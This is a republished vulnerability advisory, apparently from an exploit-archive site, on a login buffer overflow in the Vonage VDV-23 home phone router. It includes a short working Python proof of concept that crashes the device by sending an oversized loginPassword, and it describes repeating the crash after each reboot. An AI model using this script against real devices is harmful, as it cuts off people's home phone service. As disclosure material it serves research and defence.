首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vonage VDV-23 - Denial of Service
来源:vfocus.net 作者:Nu11By73 发布时间:2017-11-23  
Overview
During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.
 
Device Description:
1 port residential gateway
 
Hardware Version:
VDV-23: 115
 
Original Software Version:
3.2.11-0.9.40
 
Exploitation Writeup
This exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.
 
Proof of concept code:
The code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.
 
DOSTest.py
 
import requests

passw = 'A' * 10580
post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}

post_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows 10 - 'nt!NtQ
·WebKit - 'WebCore::TreeScope::
·iOS < 11.1 / tvOS < 11.1 / wat
·WebKit - 'WebCore::InputType::
·VX Search 10.2.14 - 'Proxy' Bu
·WebKit - 'WebCore::PositionIte
·phpMyFAQ 2.9.9 Code Injection
·WebKit - 'WebCore::AXObjectCac
·Microsoft Edge Chakra JIT Bail
·WebKit - 'WebCore::RenderText:
·Microsoft Edge Charka JIT Inco
·WebKit - 'WebCore::SimpleLineL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved